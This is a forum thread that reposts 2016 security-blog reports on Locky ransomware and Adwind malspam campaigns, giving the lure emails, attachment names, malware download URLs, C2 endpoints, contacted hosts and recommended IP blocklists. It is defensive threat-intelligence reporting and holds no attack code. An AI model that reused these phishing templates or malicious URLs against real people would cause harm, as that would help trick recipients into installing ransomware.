SPAM frauds, fakes, and other MALWARE deliveries...

Fake 'Document', 'Neopost documents', 'Clients accounts' SPAM, Locky C2

FYI...

Fake 'Document' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/docu...ccounts-your-own-email-domain-delivers-locky/
28 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Document No 25845584' (random numbers) pretending to come from random names at accounts@ your-own-email-domain or company with a random named zip attachment containing an hta file... One of the emails looks like:
From: random names at accounts@your own email domain or company
Date: Wed 28/09/2016 01:38
Subject: Document No 25845584
Attachment: Document No 25845584.zip
Thanks for using electronic billing
Please find your document attached
Regards
MAVIS CAWLEY

28 September 2016: Document No 25845584.zip: Extracts to: GVJL2720.hta - Current Virus total detections 16/55*
MALWR** was unable to get any payload or find any download sites. Payload Security*** shows a download of an encrypted filedatalinks .ir/g76vub8 which is transformed by the script to a working Locky binary. (Unfortunately Payload Security does not show the actual file or allow it to be downloaded in the free web version)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...5b45cc66ab881f9148c5f75d/analysis/1475037203/

** https://malwr.com/analysis/Yzk5OTE2NmIxMDlmNDIzYmE2ZjRmYWI5MjI0NmZiZTg/

*** https://www.hybrid-analysis.com/sam...0f45b45cc66ab881f9148c5f75d?environmentId=100
Contacted Hosts
144.76.172.200
52.24.123.95
52.85.209.134
52.33.248.56
128.241.90.219
___

Locky download and C2 locations ...
- http://blog.dynamoo.com/2016/09/locky-download-and-c2-locations-2016-09.html
28 Sep 2016 - "It's one of those day where I haven't been able to look at Lock much, but here is some analysis of download locations from my usual trusted source.
Binary download locations:
(Long list of domain names at the dynamoo URL above.)...
C2s:
176.103.56.98/apache_handler.php (PE Ivanov Vitaliy Sergeevich aka xserver.ua, Ukraine)
194.67.208.69/apache_handler.php [hostname: billy676.myihor.ru] (Marosnet, Russia)
46.8.45.169/apache_handler.php [hostname: grant.zomro.com] (Zomro, Russia)
kgijxdracnyjxh .biz/apache_handler.php [69.195.129.70] (Joe's Datacenter, US)
rluqypf .pw/apache_handler.php [86.110.118.114] (Takewyn.com, Russia)
ehkhxyvvcpk .biz/apache_handler.php [45.63.98.158] (Vultr Holdings, UK)
ufyjlxiscap .info/apache_handler.php
kdbbpmrdfnlno .pl/apache_handler.php
jlhxyspgvwcnjb .work/apache_handler.php
dceaordeoe .ru/apache_handler.php
gisydkcsxosyokkuv .work/apache_handler.php
mqlrmom .work/apache_handler.php
wfgtoxqbf .biz/apache_handler.php
ndyevynuwqe .su/apache_handler.php
vgcfwrnfrkkarc .work/apache_handler.php
Recommended blocklist:
176.103.56.98
194.67.208.69
46.8.45.169
86.110.118.114
45.63.98.158 "
___

Fake 'Neopost documents' SPAM - Locky – Odin version
- https://myonlinesecurity.co.uk/neopost-documents-0000888121970-malspam-leads-to-locky-odin-version/
28 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Neopost documents' 0000888121970 coming as usual from random companies, names and email addresses with a random named zip attachment containing a WSF file...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/09/neopost-1024x730.png

28 September 2016: 0000888121970_statement_000088812197051.zip: Extracts to: ZQSA4705.wsf
Current Virus total detections 9/54*. MALWR** shows a download of an encrypted file from one of these locations:
http ://bigballsincowtown .com/67fgbcni?gjGmIb=KpIHjmIwkWU
http ://lucianasaliani .com/67fgbcni?gjGmIb=KpIHjmIwkWU
which is transformed by the script to aCOldXqKQqm2.dll (VirusTotal 6/57***) posts back to C&C
http ://194.67.208.69 /apache_handler.php - Payload Security[4] shows a lot more C2 connections... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...a222bd24af2cb6e696dcfaa7/analysis/1475081527/

** https://malwr.com/analysis/Yjg1Yzg5MzQyMDEwNDIwMWE3NjM1ZWY5NTJjMzA0NGE/
Hosts
69.89.27.246
174.127.104.173
70.40.220.107
176.103.56.98
194.67.208.69

*** https://www.virustotal.com/en/file/...de638ea5b5572ee7f7a02d50/analysis/1475077530/

4] https://www.hybrid-analysis.com/sam...0c0a222bd24af2cb6e696dcfaa7?environmentId=100
Contacted Hosts
69.89.27.246
174.127.104.173
176.103.56.98
194.67.208.69
45.63.98.158
86.110.118.114
___

Something evil on 69.64.63.77
- http://blog.dynamoo.com/2016/09/something-evil-on-69646377.html
28 Sep 2016 - "This appears to be some sort of exploit kit leveraging hacked sites, for example:
[donotclick]franchidiscarpa[.]com/index.php
--> [donotclick]j8le7s5q745e[.]org/files/vip.php?id=4
You can see this EK infecting a legitimate site in this URLquery report*. The IP address appears to be a customer of ServerYou... Country: UA ...
These other domains are hosted on the same IP:
[donotclick]j8le7s5q745e .org
[donotclick]3wdev4pqfw1u .org
[donotclick]fg1238tq38le .net
All of those domains are registered to:
.. Registrant Country: RU ...
It looks like there might be a fair amount of activity to the IP at the moment, judging by the number of URLquery reports, so it might well be worth blocking."
* http://urlquery.net/report.php?id=1475082161540
77.81.224.215: https://www.virustotal.com/en/ip-address/77.81.224.215/information/

69.64.63.77: https://www.virustotal.com/en/ip-address/69.64.63.77/information/
>> https://www.virustotal.com/en/url/f...89ceba6bf5a63e77d0973816f3f44ca9a84/analysis/
___

Fake 'Clients accounts' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/clients-accounts-malspam-delivers-locky/
27 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Clients accounts' coming as usual from random companies, names and email addresses with a random named zip attachment containing a wsf file... One of the emails looks like:
From: Lon Kane <Kane.84@ fixed-189-180-187-189-180-32.iusacell .net>
Date: Thu 01/09/2016 19:22
Subject:Clients accounts
Attachment: a966ea5acc18.zip
Dear monika.griffithe,
I attached the clients’ accounts for your next operation.
Please look through them and collect their data. I expect to hear from you soon.
Lon Kane
VP Finance & Controller ...

27 September 2016: a966ea5acc18.zip: Extracts to: Clients accounts 32C58E xls.wsf
Current Virus total detections 8/55*. MALWR**... Payload Security*** shows a download of an encrypted file from
techskillscenter .net/zenl0z which is transformed by the script to 2Ez76BlaytMAH.dll (VirusTotal 6/57[4]) Unusually, Payload Security describes this dll file as informative, rather than malicious, which would normally mean it has some sort of anti-analysis/sandbox protection to it... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...9b4a815dbebc0b67f4199394/analysis/1474996887/

** https://malwr.com/analysis/YTU5OWRkMGIzN2JlNGMwNmI5MTIzYWZkYjY3MTE0MDI/
Hosts
213.205.40.169
186.202.126.199
81.169.145.224
158.69.147.88
66.85.27.250

*** https://www.hybrid-analysis.com/sam...d419b4a815dbebc0b67f4199394?environmentId=100
Contacted Hosts
173.247.251.145
5.196.200.247
94.242.55.225
86.110.118.114
69.195.129.70

4] https://www.virustotal.com/en/file/...02d84f5350bc2ae6e40418b6/analysis/1474997682/

:fear::fear: :mad:
 
Last edited:
Fake 'Bill', 'Debit Card blocked', 'Receipt', 'New Order' SPAM

FYI...

Fake 'Bill' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/09/malware-spam-bill-for-documents-bill.html
29 Sep 2016 - "This spam leads to Locky ransomware. The sample I have seen have no body text, but have subjects in the format:
Bill for documents 31564-29-09-2016
Bill for parcel 08388-28-09-2016
Bill for papers 657-29-09-2016

Each subject has a random number appended by the date. Attached is a RAR archive file with a name similar to Bill 657-29-09-2016.rar containing a malicious .js script which downloads...
(Many domain-names listed at the dynamoo URL above.)
The malware then phones home to the following servers:
194.67.208.69/apache_handler.php (Marosnet, Russia)
89.108.83.45/apache_handler.php (Agava, Russia)
Payload detection for the version analysed was 16/56* but there could be an updated payload by now.
Recommended blocklist:
194.67.208.69
89.108.83.45 "
* https://www.virustotal.com/en/file/...94ee182384b02bb723ad0cd5322e4044a00/analysis/

- https://myonlinesecurity.co.uk/bill-for-documents-57608-28-09-2016-malspam-delivers-locky-odin/
29 Sep 2016 - "... Locky downloaders with a series of blank/empty emails with the basic subject of 'Bill for documents' 57608-28-09-2016 pretending to come from no reply @ random companies, with a semi- random named .rar attachment containing a .JS file. These are using the new .Odin file extension on the encrypted files.. The MALWR report* shows contact with an attempted download of Net framework and some sort of mapping... The subjects vary with each email. They all start with 'bill' for and either documents, paper or parcel the a series of random numbers and the date, looking something like:
Bill for documents 57608-28-09-2016
Bill for papers 9341672-28-09-2016
Bill for parcel 422-29-09-2016

... One of the emails looks like:
From: no-reply@ simplyorganic .com
Date: Thu 29/09/2016 00:44
Subject: Bill for documents 57608-28-09-2016
Attachment: Bill 57608-28-09-2016.rar

Body content: totally blank

29 September 2016: Bill 57608-28-09-2016.rar: Extracts to: Bill 5100-4868433109.js
Current Virus total detections 8/53**. MALWR* shows a download of an encrypted file from one of these locations:
http ://g2cteknoloji .com/8g74crec?rnhaXNpMuW=MWIKgpzUlE which is transformed by the script to ErUxQjD1.dll
(VirusTotal 9/57***) shows C2 on http ://89.108.83.45 /apache_handler.php and also shows various other script files. Payload Security[4] shows a few other C2 servers... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://malwr.com/analysis/YmI0YzExZGVjZTcxNGJmOTllMzAxMzQ1ZWMyYWMyNWQ/
Hosts
185.26.144.135
194.67.208.69
89.108.83.45

** https://www.virustotal.com/en/file/...73546aa764018af430ee2097/analysis/1475114609/

*** https://www.virustotal.com/en/file/...02bb723ad0cd5322e4044a00/analysis/1475120852/

4] https://www.hybrid-analysis.com/sam...11873546aa764018af430ee2097?environmentId=100
Contacted Hosts
185.26.144.135
89.108.83.45
194.67.208.69
45.63.98.158
69.195.129.70
52.42.26.69
52.84.40.221
___

Fake 'Debit Card blocked' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/09/malware-spam-temporarily-blocked-leads.html
29 Sep 2016 - "The attachment on this spam email leads to Locky ransomware:
From: "Ambrose Clements"
Subject: Temporarily blocked
Date: Thu, 29 Sep 2016 13:37:53 +0400
Dear [redacted]
this is to inform you that your Debit Card is temporarily blocked as there were unknown transactions made today.
We attached the scan of transactions. Please confirm whether you made these transactions.

Attached is a ZIP file with a name similar to debit_card_93765d0d7.zip containing a malicious .WSF script with a random name. These scripts (according to my source) download...
(Many domain names listed at the dynamoo URL above.)
The decoded malware then phones home to:
195.123.210.11/apache_handler.php [hostname: by-f.org] (Mobicom Ltd, Latvia)
91.200.14.93/apache_handler.php [hostname: ef4bykov.example.com] (SKS-LUGAN, Ukraine)
185.117.155.20/apache_handler.php [hostname: v-jc.pro] (Marosnet, Russia)
xpcwwlauo .pw/apache_handler.php [hostname: vjc.kz] [91.234.33.132] (FOP Sedinkin Olexandr Valeriyovuch aka thehost .ua, Ukraine)
gqackht .biz/apache_handler.php [hostname: vjc.kz] [91.234.33.132] (FOP Sedinkin Olexandr Valeriyovuch aka thehost .ua, Ukraine)
bgldptjuwwq .org/apache_handler.php
cxnlxkdkxxxt .xyz/apache_handler.php
rcahcieii .work/apache_handler.php
uxaoooxqqyuslylw .click/apache_handler.php
vwktvjgpmpntoso .su/apache_handler.php
upsoxhfqut .work/apache_handler.php
nqchuuvgldmxifjg .click/apache_handler.php
ofoclobdcpeeqw .biz/apache_handler.php
kfvigurtippypgw .pl/apache_handler.php
toescilgrgvtjcac .work/apache_handler.php
Recommended blocklist:
195.123.210.11
91.200.14.93
185.117.155.20
91.234.33.132 "

- https://myonlinesecurity.co.uk/your-debit-card-is-temporarily-blocked-malspam-delivers-locky/
29 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Temporarily blocked' coming as usual from random companies, names and email addresses with a random named zip attachment containing a .WSF file... One of the emails looks like:
From: Jarvis Mason <Mason.2892@ paneltek .ca>
Date: Thu 01/09/2016 19:22
Subject: Temporarily blocked
Attachment: debit_card_4b69ba102.zip
Dear [redacted],
this is to inform you that your Debit Card is temporarily blocked as there were unknown transactions made today.
We attached the scan of transactions. Please confirm whether you made these transactions.
King regards,
Jarvis Mason
Technical Manager – Online Banking ...

1 September 2016: ea00debit_card_4b69ba102.zip: Extracts to: debit card details 92CF6066.wsf
Current Virus total detections 6/54*. Payload Security** shows a download of an encrypted file from
fhgmediaent .com/66aslu which is transformed by the script to 1lenb5SzGBo0mpu.dll (VirusTotal 10/57***)...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...82b162ab20766f0b2aa0e62a/analysis/1475140581/

** https://www.hybrid-analysis.com/sam...c5482b162ab20766f0b2aa0e62a?environmentId=100
Contacted Hosts
23.227.132.66
91.200.14.93
195.123.210.11
185.117.155.20
91.234.33.132

*** https://www.virustotal.com/en/file/...b493f48ed843c0ee10bd4122/analysis/1475141313/
___

Fake 'Receipt' xls SPAM - Locky
- http://blog.dynamoo.com/2016/09/malware-spam-receipt-103-526-receiptxls.html
29 Sep 2016 - "This spam leads to Locky ransomware:
From rosalyn.gregory@ gmail .com
Date Thu, 29 Sep 2016 21:07:46 +0800
Subject Receipt 103-526

I cannot tell if there is any body text, however there is an -attachment- Receipt.xls which contains malicious code... that in the case of the sample I analysed downloads a binary from:
opmsk .ru/g76ub76
There will be -many- other download locations too. Automated analysis [1] [2] shows that this is Locky ransomware phoning home to:
89.108.83.45/apache_handler.php (Agava, Russia)
91.200.14.93/apache_handler.php [hostname: ef4bykov .example .com] (SKS-LUGAN, Ukraine)
xpcwwlauo .pw/apache_handler.php [hostname: vjc .kz] [91.234.33.132] (FOP Sedinkin Olexandr Valeriyovuch aka thehost .ua, Ukraine)
A malicious DLL is dropped with a detection rate of 6/57*. Malicious IPs and domains overlap quite a bit with this earlier attack**. This version of Locky encrypts files with a .odin extension...
Recommended blocklist:
89.108.83.45
91.200.14.93
91.234.33.132 "
1] https://malwr.com/analysis/ZGRhZWJjNDY0MjI3NGRjYmJmNTFlNjJjYmZhNTUyN2I/
Hosts
85.17.31.113
89.108.83.45

2] https://www.hybrid-analysis.com/sam...5bd043c6ee9439fd947c10cc2d8?environmentId=100
Contacted Hosts
85.17.31.113
91.200.14.93
89.108.83.45
195.123.210.11
91.234.33.132

* https://www.virustotal.com/en/file/...4ca008b1a29cfbf631f19135/analysis/1475156266/

** http://blog.dynamoo.com/2016/09/malware-spam-temporarily-blocked-leads.html
___

Fake 'New Order' SPAM - delivers Java Adwind
- https://myonlinesecurity.co.uk/new-order-claudia-schmiesing-delivers-java-adwind/
29 Sep 2016 - "We continue to see Java Adwind Trojans daily... This one is an email with the subject of 'New Order' pretending to come from Claudia Schmiesing <claudia.schmiesing@ gmx .net> with a fuzzy unclear embedded image, that has a link hidden behind it, that when-clicked downloads a zip file containing a Java.jar file. This particular version is very badly detected. Java Adwind is normally quite well detected on Virus Total...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/09/new-order-Claudia-Schmiesing-1024x695.png

29 September 2016: flwfbq.zip: Extracts to: ORDER.jar - Current Virus total detections 4/55*. MALWR**

This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/...317bf7def048819f4798f814/analysis/1475172675/

** https://malwr.com/analysis/MWNkNzg3YzQ4MDQ5NDViNDkzMjUzNjZkODJlNWI3Mzg/
Hosts
23.105.131.212

:fear::fear: :mad:
 
Last edited:
Fake 'Receipt', 'Parcel details' SPAM

FYI...

Fake 'Receipt' SPAM - delivers Locky – Odin
- https://myonlinesecurity.co.uk/rand...ome-from-gmail-addresses-delivers-locky-odin/
30 Sep 2016 - "The Locky ransomware malware gang appear to be copying Dridex this week and going back to using word docs with embedded macros to deliver the ransomware... Locky downloaders.. a blank/empty email with the subject of 'Receipt' 45019-0740 (random numbers) pretending to come from random names at gmail .com with a random named word doc. The doc attachment name matches the subject line... One of the emails looks like:
From: chandra.har?@ gmail .com
Date: Fri 30/09/2016 10:12
Subject: Receipt 45019-0740
Attachment: Receipt 45019-0740.doc

Body content: Totally Blank/Empty

30 September 2016: Receipt 45019-0740.doc - Current Virus total detections 9/55*
.. MALWR** shows a download of an encrypted file from http ://travelinsider .com.au/021ygs7
which is transformed by the script to hupoas.dll (VirusTotal 8/57***). C2 is
http ://149.202.52.215 /apache_handler.php . Payload Security[4] shows the multiple additional C2 sites. Neither online sandbox actually show any Locky screenshots today, but Malwr clearly shows odin files in the lists... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...9f18e9cad7b454cbcfa142ff/analysis/1475226679/

** https://malwr.com/analysis/ZTNmNmYwNWIxZDE2NDFiZTk0NzhkMzRjNjkxNjdmNWE/
Hosts
203.98.84.123
89.108.83.45
149.202.52.215

*** https://www.virustotal.com/en/file/...9e802828a19c787bb3f53bda/analysis/1475227548/

4] https://www.hybrid-analysis.com/sam...cf99f18e9cad7b454cbcfa142ff?environmentId=100
Contacted Hosts
203.98.84.123
89.108.83.45
91.200.14.93
149.202.52.215
185.43.4.143
___

Fake 'Parcel details' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/another-dhl-cannot-deliver-your-parcel-malspam-delivers-locky/
30 Sep 2016 - "... Locky downloaders.. an email pretending to be a DHL cannot deliver message with the subject of 'Parcel details' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with DHL_parcel containing a WSF file... fake/spoofed DHL (and other delivery companies) malspam emails... One of the emails looks like:
From: DHL <Phelps.0827@ parket-ekonom .ru>
Date: Fri 30/09/2016 10:48
Subject: Parcel details
Attachment: DHL_parcel_06cda564b.zip
Dear berkeley,
We couldn’t deliver your parcel on September 30th because we couldn’t verify the given address.
Attached is the shipment label. Please print it out to take the parcel from our office.
Label-ID: acd8e33709cb62ea9825f9de779d1dfb8f6b566af6779b11928a9e053f
Best Wishes,
Reyes Phelps
DHL Express Service

30 September 2016: DHL_parcel: Extracts to: DHL parcel 25514DCA.wsf - Current Virus total detections 7/55*
.. MALWR** seems unable to decode/decrypt these very heavily obfuscated scripting files. Payload Security*** shows a download of an encrypted file from fernandoarias .org/tmlvg7el which is transformed by the script to
a working Locky file... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...d3bec5bebe27343a97689e61/analysis/1475228984/

** https://malwr.com/analysis/NTQzM2YzMmI1YTdiNDc3YzkyZDVlYzZkODA4ZmU2YjE/

*** https://www.hybrid-analysis.com/sam...7ccd3bec5bebe27343a97689e61?environmentId=100
Contacted Hosts
91.186.0.7
52.34.245.108
52.222.157.47
52.41.235.21

:fear::fear: :mad:
 
Last edited:
Fake 'Scan', 'please sign' SPAM

FYI...

Fake 'Scan' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-scan-2016-1003-152626-sent.html
3 Oct 2016 - "This -fake- document scan leads to Locky ransomware:
From: DAMON ASHBROOK
Date: 3 October 2016 at 10:56
Subject: [Scan] 2016-1003 15:26:26
--
Sent with Genius Scan for iOS.

The name of the sender, the subject and the attachment name (in this case 2016-1003 15-26-26.xls) will vary somewhat. This Malwr analysis* shows some of the infection in action. Overall my sources tell me that the various malicious macros download...
(Long list of domain-names listed at the dynamoo URL above.)
C2 locations are:
149.202.52.215/apache_handler.php (OVH, France)
217.12.199.244/apache_handler.php (ITL, Ukraine)
logwudorlghdou .info/apache_handler.php
krmwgapkey .work/apache_handler.php
hruicryqytbmc .xyz/apache_handler.php
vswaagv .org/apache_handler.php
smskymrtssawsjb .org/apache_handler.php
wvandssbv .org/apache_handler.php
ytxsbkfjmyxglvt .click/apache_handler.php
rqybmggvssutf .xyz/apache_handler.php
qaemlwlsvqvgcmbke .click/apache_handler.php
btlyarobjohheg .ru/apache_handler.php
civjvjrjjlv .pw/apache_handler.php
xlarkvixnlelbsvxl .xyz/apache_handler.php
A DLL is dropped with a detection rate of 19/57**.
Recommended blocklist:
149.202.52.215
217.12.199.244 "
* https://malwr.com/analysis/MzdlZjhkOGE3Njk3NDRjNjhkNjFiN2I1YzIyZWZkNGI/
Hosts
69.89.29.98
149.202.52.215

** https://www.virustotal.com/en/file/...abe1b282f26314c769c1f68e/analysis/1475489696/
___

Fake 'please sign' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-please-sign-leads-to-locky.html
3 Oct 2016 - "This -fake- financial spam leads to Locky ransomware:
Subject: please sign
From: Ricardo Buchanan
Date: Monday, 3 October 2016, 10:27
Hi [redacted],
I have made the paperwork you asked me to prepare two days ago.
Please check the attachment. It just needs your signature.
Best Wishes,
Ricardo Buchanan
CEO

In the only sample I have seen so far, the attachment name is paperwork_scan_7069f18e6.zip containing a malicious script paperwork scan ~1EB91.wsf plus a junk file with a single letter name... obfuscated script... appears to download Locky ransomware. Analysis is pending.
UPDATE: This Hybrid Analysis* clearly shows Locky in action. According to my sources there are no C2s..."
(Long list of domain-names at the dynamoo URL above.)
* https://www.hybrid-analysis.com/sam...a5c061ae66a0536ede587633b61?environmentId=100
Contacted Hosts
65.49.80.83
165.246.165.245
52.34.245.108
52.85.184.19
63.245.215.95

- https://myonlinesecurity.co.uk/lots-and-lots-of-locky-this-monday-morning/
3 Oct 2016 - "... loads of Locky today. We are seeing multiple subjects, emails and attachments. We are seeing XLS files and the typical .wsf files inside zips... email looks like:
From: KIETH WOOLDRIDGE <kieth.wooldridge.61@ kimiabiosciences .com> (random senders)
Date: Mon 03/10/2016 08:45
Subject: [Scan] 2016-1003 12:14:45
Attachment: 2016-1003 12-14-45.xls

Sent with Genius Scan for iOS.

... (another) version is:
From: Anita Ramsey <Ramsey.663@ equestrianarts .org> (random senders)
Date: Mon 03/10/2016 09:51
Subject: please sign
Attachment: paperwork_scan_35886e2.zip extracts to paperwork scan ~D45D50C5.wsf
Hi [redacted],
I have made the paperwork you asked me to prepare two days ago.
Please check the attachment. It just needs your signature.
Best Wishes,
Anita Ramsey
Head of Corporate Relations

MALWR [1] [2] [3] | VirusTotal [4][5][6] downloads from
http ://mmm2.aaomg .com/jhg45s and http ://crossroadspd .com/jhg45s which will be converted to siluans.dll
(Virustotal 14/57*) or from ossiatzki .com/dyke9 which is converted to MMCnbLicrHhc.dll (virusTotal 14/57**)..
Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://malwr.com/analysis/YzBlYzNkMWU1MDU3NDEzMzhhYzJiYjZmYTI0ZWJlYmM/
Hosts
96.0.130.2
217.12.199.244

2] https://malwr.com/analysis/OWMwZTM2N2I5MzRlNDZjOGIyNTZmMTNmNmU4ZWRjZmY/
Hosts
208.71.139.66
217.12.199.244

3] https://malwr.com/analysis/NDJlYjI0Yjc4MTRjNGIxYjgzNGI5ZWVjOGJlMWJkMzE/

4] https://www.virustotal.com/en/file/...314bb84028659e1e6e76deb0/analysis/1475484796/

5] https://www.virustotal.com/en/file/...29ba5327b8e003d54c1f0120/analysis/1475484485/

6] https://www.virustotal.com/en/file/...d0b56176617e0622afb76724/analysis/1475484779/

* https://www.virustotal.com/en/file/...abe1b282f26314c769c1f68e/analysis/1475479730/

** https://www.virustotal.com/en/file/...abe1b282f26314c769c1f68e/analysis/1475479730/

*** https://www.hybrid-analysis.com/sam...10ad0b56176617e0622afb76724?environmentId=100
Contacted Hosts
111.221.40.34
54.218.66.17
52.85.184.121

:fear::fear: :mad:
 
Last edited:
Fake 'Refund', 'Bill for parcel', 'Voicemail', 'Travel Itinerary' SPAM

FYI...

Fake 'Refund' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/refu...l-or-postal-companies-malspam-delivers-locky/
4 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Refund' pretending to come from various randomly chosen delivery, parcel or postal companies with a semi random named zip attachment starting with refund containing a WSF file... a very small portion of the several hundred received in the last few minutes, so -Any- delivery company is likely to be spoofed.
Royal Mail
PostNL
Schenker AG
Japan Post Group
FedEx
DHL
DHL Express

One of the emails looks like:
From: Royal Mail <Reynolds.21@ usacabs .com>
Date: Thu 01/09/2016 19:22
Subject: Refund
Attachment: refund_scan_a2e0a7b.zip
Dear [redacted], please submit the return form to receive the refund.
The parcel must have its original packaging. The return form is attached in this mail.
Best regards,
Elsa Reynolds
Royal Mail

4 October 2016: refund_scan_a2e0a7b.zip: Extracts to: refund scan 392CDC4.wsf
Current Virus total detections 8/54*. Payload Security** shows a download of an encrypted file from
motos13 .com/w0bmffo which is transformed by the script to a working Locky file. Unfortunately Payload Security does not show or allow download of the file in the free web version. This looks like the version with no C2 ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...f9ce014827ca2817a80d04a5/analysis/1475567273/

** https://www.hybrid-analysis.com/sam...287f9ce014827ca2817a80d04a5?environmentId=100
Contacted Hosts
81.93.240.134
52.85.184.21
52.41.235.21
___

Fake 'Bill for parcel' SPAM - delivers Locky – Odin
- https://myonlinesecurity.co.uk/bill-for-parcel-064983-04-10-2016-malspam-delivers-locky-odin/
4 Oct 2016 - "... Locky downloaders.. a -blank- email with the subject of 'Bill for parcel' 064983-04-10-2016 pretending to come from no-reply @ random email addresses with a random named zip attachment containing a WSF file. This version of Locky with an Odin-extension is using DLL files, whereas last night’s version* used .exe files.
* https://myonlinesecurity.co.uk/sure...oicemailandfax-random-domains-delivers-locky/
The subject line will always start with 'Bill' for then it will be either 'Parcel, Document, Documents, Papers' or other similar words then a random number then today’s date... One of the emails looks like:
From: no-reply@ speroresources .com
Date: Tue 04/10/2016 08:04
Subject: Bill for parcel 064983-04-10-2016
Attachment: Bill 772-04-10-2016.zip

Body content: totally blank/empty

4 October 2016: Bill 772-04-10-2016.zip: Extracts to: Bill 3609756-04-10-2016.wsf
Current Virus total detections 6/54*. MALWR** shows a download of an encrypted file from
http ://aluvista .com/erg7cbr?QJWtIXrQ=oUDSEKIWsF which is transformed by the script to WkOUeAz1.dll
(VirusTotal 7/56***). C2 is http ://158.255.6.115 /apache_handler.php - other C2 locations are shown in the Payload Security report[4]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...498d17d7678128e00800ce58/analysis/1475561395/

** https://malwr.com/analysis/ZTRlYTJiZGNiODRkNDQyMWJkMjRlZWIzNmQyM2ViMzk/
Hosts
78.46.34.83
158.255.6.115

*** https://www.virustotal.com/en/file/...65c445a650589ae01db6fa9d/analysis/1475567524/

4] https://www.hybrid-analysis.com/sam...6db498d17d7678128e00800ce58?environmentId=100
Contacted Hosts
78.46.34.83
158.255.6.115
81.177.26.201
52.85.184.9
___

Fake 'Voicemail' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/sure...oicemailandfax-random-domains-delivers-locky/
3 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Voicemail' from [random name] [random number] <[random number]> [random time] pretending to come from voicemailandfax@ random email addresses with a semi-random named zip attachment containing a HTA file... One of the emails looks like:
From: SureVoIP <voicemailandfax@ nexgtech .com>
Date: Mon 03/10/2016 22:22
Subject: Voicemail from Sherri metcalf 00780261644 <00780261644> 00:01:40
Attachment: msg_dbf6-d46d-0134-fb2b-92a8c040c64d.zip
Message From “Sherri metcalf 00780261644” 00780261644
Created: 2016.10.03 16:23:42
Duration: 00:01:40 ...

3 October 2016: msg_dbf6-d46d-0134-fb2b-92a8c040c64d.zip: Extracts to: 0332451600272.hta
Current Virus total detections 7/54*. Payload Security** shows a download of an encrypted file from
acaciainvest .ro/98h86f?HmaeXAiu=CQDbSkNs which is transformed by the script to xsyMCaVC1.exe
(VirusTotal 5/56***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...ec4461ecfdaf4954bf3a9d9d/analysis/1475531086/

** https://www.hybrid-analysis.com/sam...f71ec4461ecfdaf4954bf3a9d9d?environmentId=100
Contacted Hosts
188.240.2.32
149.202.52.215
81.177.26.201
52.85.184.21

*** https://www.virustotal.com/en/file/...3a0a890a4fb96e7297ef370f/analysis/1475531106/
___

Fake 'Travel Itinerary' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/travel-itinerary-from-random-airlines-delivers-locky/
3 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Travel Itinerary' pretending to come from random airline companies with a semi-random named zip attachment starting with 'Travel_Itinerary' containing a WSF file... I have seen these pretend to come from just about every airline in existence. Some received include:
Asiana Airlines <Flynn.92@ dsldevice .lan>
Swiss Air Lines <Hamilton.560@ dsldevice .lan>
Lufthansa <Cardenas.4568@ sewerlinereplacementrichmond .com>
Thai Airways <Mercer.030@ airtelbroadband .in>
Singapore Airlines <Burt.5051@ nbftv .no>
Cathay Pacific <Pacheco.074@ telecomitalia .it>
Turkish Airlines <Barker.585 @sabanet .ir>
Emirates <Flores.935@ deborahkellymft .com>
Virgin Australia <Terry.46@ philipskillman .com>
Qantas Airways <Weiss.213@ ceas .com.ve>

One of the emails looks like:
From: Asiana Airlines <Flynn.92@ dsldevice .lan>
Date: Mon 03/10/2016 19:09
Subject: Travel Itinerary
Attachment: Travel_Itinerary-a884558.zip
Dear [redacted]
Thank you for flying with us! We attached the Travel Itinerary for Your booking number #3FD6F18.
See the paid amount and flight information.
Best regards,
Stephan Flynn
Asiana Airlines

3 October 2016: Travel_Itinerary-a884558.zip: Extracts to: Travel_Itinerary-4F2AD50.wsf
Current Virus total detections 5/54*. MALWR is unable to fully analyse these and get any download links or payload. Payload Security** shows a download of an encrypted file from
onlinesigortam .net/njahqfis which is transformed by the script to a working Locky file...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...59446543282d29d866b228d5/analysis/1475518144/

** https://www.hybrid-analysis.com/sam...d0559446543282d29d866b228d5?environmentId=100
Contacted Hosts
159.253.36.221
185.135.80.235
91.219.31.49
178.63.238.182
69.195.129.70
50.112.202.19
52.85.184.9

:fear::fear: :mad:
 
Last edited:
Fake 'Document', 'complaint letter', 'Cancellation request' SPAM

FYI...

